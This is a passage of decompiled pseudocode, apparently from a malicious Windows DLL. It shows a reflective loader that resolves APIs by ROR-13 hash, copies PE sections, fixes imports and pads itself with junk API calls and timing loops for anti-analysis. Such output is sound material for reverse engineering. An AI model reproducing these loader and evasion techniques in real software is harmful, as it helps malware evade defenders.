								__eflags = _t514;
								if(_t514 == 0) {
									goto L111;
								}
								_t973 = __imp__GetShellWindow;
								while(1) {
									__eflags = _t793 + _t793 - _t1025;
									if(_t793 + _t793 >= _t1025) {
										break;
									}
									__eflags = _t929 - 0x68;
									if(__eflags == 0) {
										 *_t973();
										_t929 = _v40;
										__eflags = _t929 - 0x68;
										_t793 = _v36;
									}
									_t929 = (_t929 & 0xffffff00 | __eflags == 0x00000000) - 0x00000001 & 0x000000f0;
									_v40 = _t929;
									_v29 = _t929;
								}
								_t974 = _v28;
								_t884 = _v80 +  *_v60;
								_t1026 = 0;
								__eflags = 0;
								_t716 =  *_t884;
								do {
									asm("ror esi, 0xd");
									_t884 = _t884 + 1;
									_t1026 = _t1026 + _t716;
									_t716 =  *_t884;
									__eflags = _t716;
								} while (_t716 != 0);
								__eflags = _t1026 - 0xec0e4e8e;
								if(_t1026 == 0xec0e4e8e) {
									L54:
									__eflags = _v36 + 4 - _v140;
									_t886 =  >  ? _t974 : _v112;
									_t975 = _v80;
									_v36 =  >  ? _t974 : _v112;
									_v8 = 0xffffffff;
									_t888 =  *((intOrPtr*)(_v64 + 0x1c)) + ( *_v96 & 0x0000ffff) * 4;
									__eflags = _t1026 - 0xec0e4e8e;
									if(_t1026 != 0xec0e4e8e) {
										__eflags = _t1026 - 0x7c0dfcaa;
										if(_t1026 != 0x7c0dfcaa) {
											__eflags = _t1026 - 0x91afca54;
											if(_t1026 != 0x91afca54) {
												L73:
												_t514 = _v84 + 0xffff;
												_v84 = _t514;
												L75:
												_t793 = _v36;
												_t1027 = _t793;
												_t929 = _v40;
												__eflags = _t793 - _v52;
												if(_t793 <= _v52) {
													L42:
													_t1025 = _v52;
													continue;
												}
												_t724 = _t793 + 4;
												_v28 = _t724;
												asm("o16 nop [eax+eax]");
												while(1) {
													_t976 = _t1027;
													__eflags = _t724 - _v52;
													if(_t724 > _v52) {
														break;
													}
													__eflags = _t929 - 4;
													if(_t929 != 4) {
														__imp__UnregisterApplicationRecoveryCallback();
														L109:
														GetEnvironmentStringsW();
														goto L109;
													}
													E6E7D57C0();
													_t929 = _t724 + (_t724 << 2) << 2;
													_v40 = _t929;
													_v29 = _t929;
													__eflags = _t929 - 0x2c;
													if(_t929 <= 0x2c) {
														goto L109;
													}
													_t514 = _v84;
													_t1027 = _t1027 + 1;
													_t793 = _v36;
													__eflags = _t976 - _v112;
													if(_t976 < _v112) {
														goto L42;
													}
													_t724 = _v28;
												}
												_v60 =  &(_v60[2]);
												_v96 = _v96 + 2;
												_t514 = _v84;
												_t793 = _v36;
												goto L42;
											}
											_t727 = _v52;
											__eflags = _v36 - _t727;
											if(_v36 < _t727) {
												__eflags = _t929 - 0x2c;
												if(_t929 < 0x2c) {
													L107:
													GetCurrentThreadId();
													goto L107;
												}
												asm("movsd xmm1, [0x6e8185e8]");
												__eflags = _t929 - 9;
												if(_t929 >= 9) {
													L66:
													asm("movss xmm0, [0x6e8186b4]");
													asm("movss [ebp-0x34], xmm0");
													asm("movsd xmm0, [0x6e8185f0]");
													asm("movsd [ebp-0x84], xmm0");
													do {
														_t729 = GetCapture();
														asm("movss xmm1, [ebp-0x34]");
														asm("movsd xmm0, [ebp-0x84]");
														asm("cvtps2pd xmm1, xmm1");
														asm("mulsd xmm1, xmm0");
														asm("cvtpd2ps xmm1, xmm1");
														asm("movss [ebp-0x34], xmm1");
														_t731 = E6E7D5990(_t929, E6E8083AF(_t729), _t929);
														asm("movss xmm0, [ebp-0x34]");
														_t1033 = _t1033 + 8;
														_t732 = _t731;
														asm("cvtps2pd xmm0, xmm0");
														asm("movd xmm1, eax");
														asm("cvtdq2pd xmm1, xmm1");
														asm("addsd xmm0, xmm1");
														asm("movsd [ebp-0x84], xmm1");
														asm("cvttsd2si eax, xmm0");
														_v40 = _t732;
														_v29 = _t732;
														__eflags = _t732 - 0x31;
													} while (_t732 == 0x31);
													asm("movss xmm2, [0x6e8186d4]");
													_t977 = 0x6c;
													asm("movss [ebp-0x34], xmm2");
													_v28 = 0;
													__eflags = _t732 - 0xd;
													if(_t732 < 0xd) {
														L71:
														__eflags = _t732 - 0x1f;
														if(_t732 != 0x1f) {
															AreFileApisANSI();
															_v40 = 0xfffffff6;
															_v29 = 0xfffffff6;
														}
														goto L73;
													}
													__eflags = 0;
													_t735 = E6E808500(_t732, 0x6c);
													asm("xorps xmm1, xmm1");
													asm("cvtsd2ss xmm1, xmm0");
													do {
														asm("cvttss2si ecx, [ebp-0x34]");
														asm("mulss xmm1, [ebp-0x34]");
														asm("cvttss2si esi, xmm1");
														E6E7D57C0();
														E6E808500(_t735, _t735);
														asm("cdq");
														_t977 = _t977 + _t1026;
														asm("cvtsd2ss xmm0, xmm0");
														asm("adc eax, edx");
														asm("movss [ebp-0x34], xmm0");
														_t735 = E6E808500(_v28, _t977);
														asm("xorps xmm1, xmm1");
														asm("cvtsd2ss xmm1, xmm0");
														asm("movd xmm0, esi");
														asm("cvtdq2ps xmm0, xmm0");
														asm("mulss xmm0, [ebp-0x34]");
														asm("subss xmm0, xmm1");
														asm("cvttss2si eax, xmm0");
														_v40 = _t735;
														_v29 = _t735;
														__eflags = _t735 - 0xd;
													} while (_t735 >= 0xd);
													goto L71;
												} else {
													goto L65;
												}
												do {
													L65:
													asm("movaps xmm0, xmm1");
													asm("mulsd xmm0, xmm1");
													asm("cvttsd2si eax, xmm0");
													asm("movaps xmm1, xmm0");
													__eflags = _t727 - 9;
												} while (_t727 < 9);
												goto L66;
											}
											_v48 =  *((intOrPtr*)(_t888 + _t975)) + _t975;
											_t514 = _v84 + 0xffff;
											_v84 = _t514;
											goto L75;
										}
										_t743 = _v36 + _v36;
										__eflags = _t743 - _v52;
										if(_t743 < _v52) {
											do {
												__eflags = _t929 - 0x7d;
												if(_t929 <= 0x7d) {
													L98:
													__eflags = _t929 - 0x6c;
													if(_t929 != 0x6c) {
														GetDialogBaseUnits();
													}
													_v29 = 0x36;
													_v41 = 0x33;
													do {
														GetOEMCP();
														_t745 = E6E7D5ED0(_v29, _t929);
														_v85 = _t745;
														E6E7D57C0();
														_v29 = _t745;
														_t746 = E6E7D5ED0(_v41, _t929);
														_t933 = _t746;
														_v64 = _t746;
														_t743 = _v85;
														_v41 = _t933;
														_t929 = _v29 * _t743 - _t933;
														__eflags = _t929 - 0xd;
													} while (_t929 < 0xd);
													goto L102;
												}
												_v29 = 0x78;
												do {
													E6E7D57C0();
													_t1029 = _t743;
													asm("cdq");
													_t902 = E6E7D5780(_t1029, _t1029, _t929);
													_t1033 = _t1033 + 8;
													_v29 = _t902;
													asm("cdq");
													_t743 = _t1029 / (_v29 + _t743) - _t902;
													_t929 = _t743;
													__eflags = _t929 - 0x7d;
												} while (_t929 > 0x7d);
												goto L98;
												L102:
												__eflags = _t929 - 0x3e;
												if(_t929 < 0x3e) {
													_t753 = GetForegroundWindow();
													asm("movss xmm0, [0x6e8186c8]");
													_t743 = E6E7D5990(_t929, E6E8081CE(_t753), _t929);
													_t1033 = _t1033 + 8;
													asm("movd xmm0, eax");
													asm("cvtdq2ps xmm0, xmm0");
													asm("addss xmm0, [0x6e81865c]");
													asm("cvttss2si edx, xmm0");
												}
												__eflags = _t929 - 0x4c;
											} while (_t929 == 0x4c);
											L106:
											GetACP();
											goto L106;
										}
										_v148 =  *((intOrPtr*)(_t888 + _t975)) + _t975;
										_t514 = _v84 + 0xffff;
										_v84 = _t514;
										goto L75;
									}
									__eflags = _v36 + 4 - _v52;
									if(_v36 + 4 <= _v52) {
										while(1) {
											__eflags = _t929 - 6;
											if(_t929 != 6) {
												goto L86;
											}
											L85:
											GetCapture();
											L87:
											_t1030 = E6E7D5ED0(0x49, _t929);
											_v64 = _t1030;
											_t767 = E6E7D5780(_t766, 0x49, 0);
											_t1033 = _t1033 + 8;
											asm("cdq");
											_v28 = _t767;
											asm("cdq");
											_t929 = _t1030 - E6E807C80(_t1030, _t929, _v28, _t929) + _v28;
											__eflags = _t929;
											L88:
											__eflags = _t929 - 5;
											if(_t929 < 5) {
												_t763 = E6E7D5780(InSendMessage(), 0x39, 0);
												_t1033 = _t1033 + 8;
												_v64 = _t763;
												E6E7D57C0();
												asm("xorps xmm0, xmm0");
												_t929 = _t763 + _v64;
												asm("movss [ebp-0x18], xmm0");
												__eflags = _t929 - 6;
												if(_t929 != 6) {
													goto L86;
												} else {
													goto L91;
												}
												do {
													L91:
													GetCurrentThreadId();
													asm("movss xmm0, [ebp-0x18]");
													asm("addss xmm0, xmm0");
													asm("cvttss2si edx, xmm0");
													asm("movss [ebp-0x18], xmm0");
													__eflags = _t929 - 6;
												} while (_t929 == 6);
												while(1) {
													__eflags = _t929 - 6;
													if(_t929 != 6) {
														goto L86;
													}
													goto L85;
												}
											}
											GetThreadLocale();
											_t929 = 0;
											continue;
											L86:
											__eflags = _t929 - 0xf;
											if(_t929 > 0xf) {
												goto L88;
											}
											goto L87;
										}
									}
									_v144 =  *((intOrPtr*)(_t888 + _t975)) + _t975;
									_t514 = _v84 + 0xffff;
									_v84 = _t514;
									goto L75;
								}
								__eflags = _t1026 - 0x7c0dfcaa;
								if(_t1026 == 0x7c0dfcaa) {
									goto L54;
								}
								__eflags = _t1026 - 0x91afca54;
								if(_t1026 != 0x91afca54) {
									_t514 = _v84;
									goto L75;
								}
								goto L54;
							}
							goto L111;
						}
						asm("movsd xmm0, [0x6e818588]");
						_t987 = 1;
						asm("movsd [ebp-0x84], xmm0");
						asm("movsd [ebp-0x40], xmm0");
						do {
							__imp__GetTickCount64();
							asm("movsd xmm0, [ebp-0x40]");
							asm("subsd xmm0, [0x6e818580]");
							asm("mulsd xmm0, [ebp-0xa8]");
							asm("addsd xmm0, [ebp-0x7c]");
							asm("movsd [ebp-0x40], xmm0");
							_t514 = E6E8084C0(E6E807870(_t514, _t909, 0x2710, 0), _t515, _t909);
							asm("movsd xmm1, [ebp-0x40]");
							_t987 = _t987 + 1;
							__eflags = _t987;
							asm("mulsd xmm1, xmm0");
							asm("movd xmm0, esi");
							asm("cvtdq2pd xmm0, xmm0");
							asm("mulsd xmm1, [0x6e818568]");
							asm("movsd [ebp-0x40], xmm0");
							asm("addsd xmm1, [ebp-0x64]");
							asm("movsd [ebp-0x64], xmm1");
							asm("movsd xmm1, [ebp-0xb8]");
							asm("comisd xmm1, xmm0");
						} while (_t987 >= 0);
						_t910 = _v36;
						_t796 = _t910;
						_t988 = _v52;
						_v28 = _t910;
						__eflags = _t910 - _t988;
						if(_t910 <= _t988) {
							L144:
							_t946 = _v72;
							_t989 = _v92;
							L145:
							_t797 = _v76;
							L146:
							_v76 = _t797 - 1;
							__eflags = _t797;
							if(_t797 == 0) {
								asm("movsd xmm0, [0x6e818668]");
								_t990 = 1;
								_t947 = __imp__GetTickCount64;
								asm("movsd [ebp-0x98], xmm0");
								asm("movsd [ebp-0xd8], xmm0");
								asm("movsd xmm0, [0x6e818588]");
								asm("movsd [ebp-0x40], xmm0");
								do {
									_t517 =  *_t947();
									asm("movsd xmm0, [ebp-0x40]");
									asm("mulsd xmm0, [ebp-0xa8]");
									asm("addsd xmm0, [ebp-0x7c]");
									asm("movsd [ebp-0x40], xmm0");
									E6E8084C0(E6E807870(_t517, _t910, 0x2710, 0), _t518, _t910);
									asm("movsd xmm1, [ebp-0x40]");
									_t990 = _t990 + 1;
									__eflags = _t990;
									asm("mulsd xmm1, xmm0");
									asm("movd xmm0, esi");
									asm("cvtdq2pd xmm0, xmm0");
									asm("mulsd xmm1, [0x6e818558]");
									asm("movsd [ebp-0x40], xmm0");
									asm("addsd xmm1, [ebp-0x64]");
									asm("movsd [ebp-0x64], xmm1");
									asm("movsd xmm1, [0x6e818668]");
									asm("comisd xmm1, xmm0");
								} while (_t990 >= 0);
								__eflags = _v36 - _v52;
								if(_v36 == _v52) {
									asm("movsd xmm0, [0x6e818628]");
									_t800 = _v40;
									asm("movsd [ebp-0x98], xmm0");
									__eflags = _v40 - 0x13;
									if(_v40 != 0x13) {
										L273:
										CreateMenu();
										goto L273;
									} else {
										goto L272;
									}
									do {
										L272:
										asm("cvttsd2si ecx, xmm0");
										_t800 = E6E7D5ED0(_t800, _t910);
										_t523 = E6E808500(_t522, _t522);
										asm("cvtsd2ss xmm0, xmm0");
										asm("xorps xmm1, xmm1");
										asm("cvtss2sd xmm1, xmm0");
										asm("movaps xmm0, xmm1");
										asm("mulsd xmm0, [ebp-0x98]");
										asm("divsd xmm1, xmm0");
										asm("movsd [ebp-0x98], xmm0");
										asm("cvttsd2si eax, xmm1");
										__eflags = _t523 - 0x13;
									} while (_t523 == 0x13);
									goto L273;
								}
								_t524 =  *_t947();
								__imp__GetTickCount64();
								E6E8084C0(E6E807870(_t524, _t910, 0x2710, 0), _t525, _t910);
								asm("mulsd xmm0, [ebp-0xb0]");
								asm("movsd [ebp-0x64], xmm0");
								E6E8084C0(E6E807870(_t524, _t910, 0x2710, 0), _t527, _t910);
								asm("mulsd xmm0, [ebp-0x7c]");
								_t803 = _v116;
								asm("movsd xmm1, [ebp-0x64]");
								asm("addsd xmm1, xmm0");
								_t949 =  *(_t803 + 6) & 0x0000ffff;
								_t993 = _t803 + 0x18 + ( *(_t803 + 0x14) & 0x0000ffff);
								_t530 = _v56;
								asm("mulsd xmm1, [ebp-0xa8]");
								asm("divsd xmm1, [0x6e818598]");
								asm("movsd [ebp-0x64], xmm1");
								while(1) {
									_v60 = _t530;
									_t531 = _t949;
									_t949 = _t949 - 1;
									_v108 = _t993;
									_v76 = _t993;
									__eflags = _t531;
									if(_t531 == 0) {
										break;
									}
									_t848 = _v36;
									__eflags = _t848 - _v140;
									_t635 =  >  ? _t848 : _v112;
									_t910 =  *((intOrPtr*)(_t993 + 0x14)) + _v92;
									_t849 =  >  ? _t848 : _v112;
									_t636 =  *(_t993 + 0x10);
									_v36 =  >  ? _t848 : _v112;
									_t851 =  *((intOrPtr*)(_t993 + 0xc)) + _v80;
									_v60 = _t636;
									__eflags = _t636;
									if(_t636 == 0) {
										L158:
										_t530 = _t636 - 1;
										_v8 = 0xffffffff;
										_v56 = _t530;
										_t993 = _t993 + 0x28;
										continue;
									}
									_t1015 = _t636;
									do {
										_t637 =  *_t910;
										_t910 = _t910 + 1;
										 *_t851 = _t637;
										_t851 = _t851 + 1;
										_t1015 = _t1015 - 1;
										__eflags = _t1015;
									} while (_t1015 != 0);
									_v60 = _t1015;
									_t993 = _v76;
									_t636 = _v60;
									goto L158;
								}
								asm("movsd xmm0, [0x6e818588]");
								_t994 = 1;
								asm("movsd [ebp-0x40], xmm0");
								do {
									__imp__GetTickCount64();
									asm("movsd xmm0, [ebp-0x40]");
									asm("subsd xmm0, [0x6e818580]");
									asm("mulsd xmm0, [ebp-0xa8]");
									asm("addsd xmm0, [ebp-0x7c]");
									asm("movsd [ebp-0x40], xmm0");
									_t531 = E6E8084C0(E6E807870(_t531, _t910, 0x2710, 0), _t532, _t910);
									asm("mulsd xmm0, [ebp-0x40]");
									_t994 = _t994 + 1;
									__eflags = _t994;
									asm("movsd xmm1, [ebp-0xb8]");
									asm("mulsd xmm0, [0x6e818568]");
									asm("addsd xmm0, [ebp-0x64]");
									asm("movsd [ebp-0x64], xmm0");
									asm("movsd [ebp-0xc0], xmm0");
									asm("movd xmm0, esi");
									asm("cvtdq2pd xmm0, xmm0");
									asm("comisd xmm1, xmm0");
									asm("movsd [ebp-0x40], xmm0");
								} while (_t994 >= 0);
								_t805 = _v40;
								while(1) {
									asm("cdq");
									_t535 = _v36 - _t910 >> 1;
									__eflags = _t535 - _v52;
									if(_t535 >= _v52) {
										break;
									}
									__eflags = _t805 - 0x3f;
									if(_t805 != 0x3f) {
										__imp__GetShellWindow();
										E6E7D57C0();
										E6E7D57C0();
										_t847 = _t535;
										_t545 = _t535;
										asm("cdq");
										__eflags = _t545 % _t847;
										_t535 = _t545 / _t847;
										_t805 = _t535;
									}
									asm("movsd xmm0, [0x6e818610]");
									asm("movsd [ebp-0xb8], xmm0");
									__eflags = _t805 - 0x12;
									if(_t805 < 0x12) {
										L261:
										__eflags = _t805 - 0x62;
										if(_t805 <= 0x62) {
											E6E7D57C0();
										} else {
											E6E7D5780(_t535, 0x54, 0);
											_t1033 = _t1033 + 8;
										}
										asm("movss xmm0, [0x6e818660]");
										asm("movss [ebp-0x2c], xmm0");
										do {
											_t536 = GetLogicalDrives();
											asm("movss xmm0, [ebp-0x2c]");
											asm("divss xmm0, xmm0");
											asm("cvttss2si eax, xmm0");
											asm("movss [ebp-0x2c], xmm0");
											__eflags = _t536 - 0x6b;
										} while (_t536 <= 0x6b);
										__eflags = _t536 - 0x49;
										if(_t536 > 0x49) {
											E6E7D57C0();
										}
										asm("movss xmm0, [0x6e818658]");
										_t910 = 0;
										asm("movss [ebp-0x58], xmm0");
										_t478 = _t910 + 8; // 0x8
										_t807 = _t478;
										E6E808500(_t536, _t478);
										asm("cvtsd2ss xmm0, xmm0");
										asm("movss [ebp-0x2c], xmm0");
										do {
											__imp__GetThreadErrorMode();
											asm("cvttss2si ecx, [ebp-0x58]");
											_t539 = E6E808500(E6E7D5ED0(_t807, 0), _t538);
											asm("xorps xmm1, xmm1");
											asm("cvtsd2ss xmm1, xmm0");
											asm("movss xmm0, [ebp-0x2c]");
											asm("subss xmm0, [ebp-0x58]");
											asm("movss [ebp-0x60], xmm1");
											asm("movss [ebp-0x58], xmm0");
											asm("movaps xmm0, xmm1");
											asm("addss xmm0, [ebp-0x2c]");
											_t807 = E6E8081CE(_t539);
											E6E808500(_t540, _t807);
											asm("xorps xmm1, xmm1");
											asm("cvtsd2ss xmm1, xmm0");
											asm("movss xmm0, [ebp-0x58]");
											asm("divss xmm0, xmm1");
											asm("movss [ebp-0x2c], xmm1");
											asm("movss xmm1, [ebp-0x60]");
											asm("subss xmm1, xmm0");
											asm("cvttss2si ecx, xmm1");
											_v40 = _t807;
											_v29 = _t807;
											__eflags = _t807 - 0x28;
										} while (_t807 < 0x28);
										continue;
									} else {
										asm("movsd xmm0, [0x6e818638]");
										_t1013 = 0x2e;
										asm("movsd [ebp-0xb0], xmm0");
										do {
											__imp__InitNetworkAddressControl();
											asm("movsd xmm1, [ebp-0xb8]");
											asm("movaps xmm0, xmm1");
											asm("subsd xmm0, [ebp-0xb0]");
											asm("cvttsd2si eax, xmm0");
											_t805 = _t535;
											asm("cdq");
											asm("movd xmm0, ecx");
											asm("cvtdq2pd xmm0, xmm0");
											_t1013 = _t805 / _t1013;
											_t535 = _t1013 + _t805;
											asm("mulsd xmm1, xmm0");
											asm("movsd [ebp-0xb0], xmm0");
											asm("movd xmm0, eax");
											asm("cvtdq2pd xmm0, xmm0");
											asm("movsd [ebp-0xb8], xmm1");
											asm("addsd xmm0, xmm1");
											asm("cvttsd2si ecx, xmm0");
											__eflags = _t805 - 0x12;
										} while (_t805 >= 0x12);
										goto L261;
									}
								}
								_t951 = _v80;
								_t547 = _v116 - 0xffffff80;
								_v28 = _t547;
								_v120 = _t547;
								_t996 =  *_t547 + _t951;
								_v72 = _t996;
								_v92 = _t996;
								asm("o16 nop [eax+eax]");
								while(1) {
									_t913 =  *(_t996 + 0xc);
									__eflags = _t913;
									if(_t913 == 0) {
										break;
									}
									__eflags =  *_t547;
									if( *_t547 == 0) {
										break;
									}
									__eflags = _v36 + _v36 - _v140;
									_v8 = 8;
									_t835 =  >=  ? _v36 : _v112;
									_t588 =  >=  ? _v36 : _v112;
									_v36 = _t588;
									_v64 = _t588;
									_t921 = _v144(_t913 + _t951);
									_t960 =  *_t996 + _v80;
									_t1008 =  *((intOrPtr*)(_t996 + 0x10)) + _v80;
									_t836 = _v40;
									_t591 = _v36;
									_v164 = _t921;
									_v56 = _t960;
									_v108 = _t1008;
									_v8 = 0xffffffff;
									__eflags =  *_t1008;
									_v60 = _t960;
									_v84 = _t921;
									_v76 = _t1008;
									if( *_t1008 == 0) {
										L188:
										_t592 = _v52;
										__eflags = _v36 - _v52;
										if(_v36 == _v52) {
											asm("movss xmm1, [0x6e818678]");
											do {
												asm("movaps xmm0, xmm1");
												_t592 = E6E7D5780(E6E8081CE(_t592), _t593, 0);
												_t1033 = _t1033 + 8;
												asm("movd xmm1, eax");
												asm("cvtdq2ps xmm1, xmm1");
												asm("movaps xmm0, xmm1");
												asm("addss xmm0, [0x6e818548]");
												asm("cvttss2si eax, xmm0");
												_v40 = _t592;
												_v29 = _t592;
												__eflags = _t592 - 0x61;
											} while (_t592 != 0x61);
											_t996 = _v72;
											_t547 = _v28;
											_t951 = _v80;
											continue;
										}
										_t547 = _v28;
										_t996 = _v72 + 0x14;
										_t951 = _v80;
										_v72 = _t996;
										_v92 = _t996;
										continue;
									} else {
										do {
											__eflags = _t960;
											if(_t960 == 0) {
												L191:
												_t961 = _v60;
												_t595 = _t591 + _t591;
												__eflags = _t595 - _v52;
												if(_t595 < _v52) {
													__eflags = _t836 - 0x71;
													if(_t836 <= 0x71) {
														_t623 = GetProcessWindowStation();
														asm("movsd xmm0, [0x6e818618]");
														E6E7D5990(_t921, E6E8083AF(_t623), _t921);
														_t1033 = _t1033 + 8;
														asm("movd xmm0, esi");
														asm("cvtdq2pd xmm0, xmm0");
														asm("cvttsd2si ecx, xmm0");
														_t627 = E6E808500(E6E7D5ED0(_t836, _t921), _t626);
														asm("cvtsd2ss xmm0, xmm0");
														asm("cvtss2sd xmm0, xmm0");
														asm("movsd [ebp-0xd0], xmm0");
														_t628 = E6E808500(_t627, 0x7f);
														asm("cvtsd2ss xmm0, xmm0");
														asm("mulss xmm0, [0x6e8186cc]");
														_t836 = E6E8081CE(_t628);
														_t595 = E6E808500(_t629, _t836);
														asm("movd xmm1, esi");
														_t1008 = _v76;
														asm("cvtdq2pd xmm1, xmm1");
														asm("addsd xmm0, xmm1");
														asm("movsd xmm1, [ebp-0xd0]");
														asm("addsd xmm1, xmm0");
														asm("cvttsd2si ecx, xmm1");
													}
													asm("movsd xmm0, [0x6e8185f8]");
													__eflags = _t836 - 0x6b;
													if(_t836 > 0x6b) {
														L197:
														__eflags = _t836 - 0x26;
														if(_t836 >= 0x26) {
															__imp__UnregisterApplicationRecoveryCallback();
														}
														asm("movsd xmm0, [0x6e818608]");
														E6E7D5780(E6E8083AF(_t595), _t596, 0);
														_t1033 = _t1033 + 8;
														_t921 = _v84;
														asm("movd xmm1, eax");
														asm("cvtdq2pd xmm1, xmm1");
														asm("movaps xmm0, xmm1");
														asm("subsd xmm0, [0x6e818630]");
														asm("subsd xmm1, xmm0");
														asm("cvttsd2si ecx, xmm1");
														_v40 = _t836;
														_v29 = _t836;
														goto L187;
													} else {
														do {
															asm("cvttsd2si ecx, xmm0");
															E6E7D57C0();
															_t836 = _t595;
															_t595 = E6E808500(_t595, _t836);
															asm("cvttsd2si ecx, xmm0");
															__eflags = _t836 - 0x6b;
														} while (_t836 <= 0x6b);
														goto L197;
													}
												}
												_t631 = _v80 +  *_t1008;
												_v28 = _t631;
												_v120 = _t631;
												_t633 = _v148(_t921, _t631 + 2);
												_t836 = _v40;
												_t921 = _v84;
												 *_t1008 = _t633;
												goto L187;
											}
											__eflags =  *_t960;
											if( *_t960 >= 0) {
												goto L191;
											}
											_t921 = _v84;
											_t962 = _t591;
											_v56 = _t591;
											__eflags = _t962 - _v52;
											if(_t962 <= _v52) {
												L186:
												_t961 = _v60;
												goto L187;
											}
											asm("cdq");
											_t601 = _t591 - _t921;
											__eflags = _t601;
											_t602 = _t601 >> 1;
											_v100 = _t602;
											while(1) {
												_t1011 = _t962;
												_v108 = _t1011;
												__eflags = _t602 - _v52;
												if(_t602 >= _v52) {
													break;
												}
												asm("movss xmm0, [0x6e8186b0]");
												asm("movss [ebp-0x2c], xmm0");
												__eflags = _t836 - 0x3d;
												if(_t836 != 0x3d) {
													L175:
													_t609 = 0x72;
													__eflags = _t836 - 0x1c;
													if(_t836 < 0x1c) {
														L178:
														_v96 = 0;
														_t963 = 0x33;
														__eflags = _t836 - 0x3c;
														if(_t836 == 0x3c) {
															L181:
															asm("xorps xmm2, xmm2");
															__eflags = _t836 - 0x1c;
															if(_t836 < 0x1c) {
																L184:
																_t602 = _v100;
																_t962 = _v56 + 1;
																_v56 = _t962;
																__eflags = _t1011 - _v112;
																if(_t1011 >= _v112) {
																	continue;
																}
																_t1008 = _v76;
																_t921 = _v84;
																goto L186;
															}
															asm("xorps xmm0, xmm0");
															do {
																asm("movaps xmm1, xmm0");
																asm("cvtps2pd xmm0, xmm2");
																asm("mulsd xmm0, xmm1");
																asm("cvtpd2ps xmm2, xmm0");
																asm("cvtps2pd xmm0, xmm2");
																asm("mulsd xmm0, xmm1");
																asm("cvttsd2si ecx, xmm0");
																_v40 = _t836;
																_v29 = _t836;
																__eflags = _t836 - 0x1c;
															} while (_t836 >= 0x1c);
															goto L184;
														} else {
															goto L179;
														}
														do {
															L179:
															asm("cdq");
															_t613 = E6E808500(E6E807C80(0x14, _t921, _t963, _v96), _t612);
															asm("xorps xmm1, xmm1");
															asm("cvtsd2ss xmm1, xmm0");
															asm("movd xmm0, esi");
															asm("cvtdq2ps xmm0, xmm0");
															asm("movss [ebp-0x3c], xmm1");
															asm("divss xmm1, xmm0");
															_t841 = (_v96 << 0x00000020 | _t963) << 1;
															asm("cvttss2si eax, xmm1");
															_t963 = _t963 + _t963;
															_v96 = _t841;
															_v48 = _t613;
															asm("cdq");
															_t836 = E6E807C80(0x14, _t921, _t963, _t841);
															E6E808500(_t615, _t836);
															asm("movss xmm1, [ebp-0x3c]");
															asm("cvtsd2ss xmm0, xmm0");
															asm("subss xmm1, xmm0");
															asm("cvttss2si ecx, xmm1");
															_v40 = _t836;
															_v29 = _t836;
															__eflags = _t836 - 0x3c;
														} while (_t836 != 0x3c);
														_t1011 = _v108;
														goto L181;
													}
													asm("o16 nop [eax+eax]");
													do {
														_t609 = _t609 + _t609;
														_t836 = _t609;
														_v40 = _t836;
														_v29 = _t836;
														__eflags = _t609 - 0x1c;
													} while (_t609 >= 0x1c);
													goto L178;
												} else {
													goto L174;
												}
												do {
													L174:
													_t618 = GetDesktopWindow();
													asm("movss xmm0, [ebp-0x2c]");
													_t620 = E6E7D5990(_t921, E6E8081CE(_t618), _t921);
													_t1033 = _t1033 + 8;
													asm("movd xmm1, eax");
													asm("cvtdq2ps xmm1, xmm1");
													asm("movaps xmm0, xmm1");
													asm("movss [ebp-0x2c], xmm1");
													asm("divss xmm0, xmm1");
													asm("cvttss2si eax, xmm0");
													asm("movd xmm0, eax");
													asm("cvtdq2ps xmm0, xmm0");
													asm("subss xmm1, xmm0");
													asm("cvttss2si eax, xmm1");
													_t836 = _t620;
													_v40 = _t836;
													_v29 = _t836;
													__eflags = _t836 - 0x3d;
												} while (_t836 == 0x3d);
												goto L175;
											}
											_t921 = _v84;
											_t961 = _v60;
											_t1008 = _v76;
											_t836 = _v40;
											 *_t1008 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t921 + 0x3c)) + _t921 + 0x78)) + _t921 + 0x1c)) + (( *_t961 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t921 + 0x3c)) + _t921 + 0x78)) + _t921 + 0x10))) * 4 + _t921)) + _t921;
											L187:
											_t1008 =  &(_t1008[1]);
											__eflags = _t961;
											_v76 = _t1008;
											_v108 = _t1008;
											_t600 =  ==  ? _t961 : _t961 + 4;
											__eflags =  *_t1008;
											_t960 =  ==  ? _t961 : _t961 + 4;
											_t591 = _v36;
											_v60 = _t960;
											_v56 = _t960;
										} while ( *_t1008 != 0);
										goto L188;
									}
								}
								asm("movsd xmm0, [0x6e818588]");
								_t997 = 1;
								_t952 = __imp__GetTickCount64;
								asm("movsd [ebp-0xc8], xmm0");
								asm("movsd xmm0, [ebp-0xc0]");
								asm("movsd [ebp-0x40], xmm0");
								do {
									E6E8084C0(E6E807870( *_t952(), _t913, 0x2710, 0), _t549, _t913);
									asm("movsd xmm1, [ebp-0xc8]");
									_t997 = _t997 + 1;
									__eflags = _t997;
									asm("mulsd xmm1, [ebp-0xa8]");
									asm("addsd xmm1, [ebp-0x7c]");
									asm("mulsd xmm0, xmm1");
									asm("movsd xmm1, [0x6e818668]");
									asm("mulsd xmm0, [0x6e818558]");
									asm("addsd xmm0, [ebp-0x40]");
									asm("movsd [ebp-0x40], xmm0");
									asm("movd xmm0, esi");
									asm("cvtdq2pd xmm0, xmm0");
									asm("comisd xmm1, xmm0");
									asm("movsd [ebp-0xc8], xmm0");
								} while (_t997 >= 0);
								_t551 = _v36;
								_t810 = _v52;
								_t953 = _v80;
								__eflags = _t551 - _t810;
								if(_t551 != _t810) {
									_t914 = _v116;
									_t998 = _t914 + 0xa0;
									_t954 = _t953 -  *((intOrPtr*)(_t914 + 0x34));
									__eflags =  *(_t998 + 4);
									if( *(_t998 + 4) == 0) {
										L235:
										_t999 = 1;
										do {
											__imp__GetTickCount64();
											_t551 = E6E8084C0(E6E807870(_t551, _t914, 0x2710, 0), _t552, _t914);
											asm("movsd xmm1, [ebp-0x84]");
											_t999 = _t999 + 1;
											__eflags = _t999;
											asm("mulsd xmm1, [ebp-0xa8]");
											asm("addsd xmm1, [ebp-0x7c]");
											asm("mulsd xmm0, xmm1");
											asm("movsd xmm1, [ebp-0x98]");
											asm("mulsd xmm0, [0x6e818558]");
											asm("addsd xmm0, [ebp-0x40]");
											asm("movsd [ebp-0x40], xmm0");
											asm("movd xmm0, esi");
											asm("cvtdq2pd xmm0, xmm0");
											asm("comisd xmm1, xmm0");
											asm("movsd [ebp-0x84], xmm0");
										} while (_t999 >= 0);
										__eflags = _v36 + 4 - _v52;
										if(_v36 + 4 > _v52) {
											_t955 = _v80;
											 *0x6e820484 = _t955;
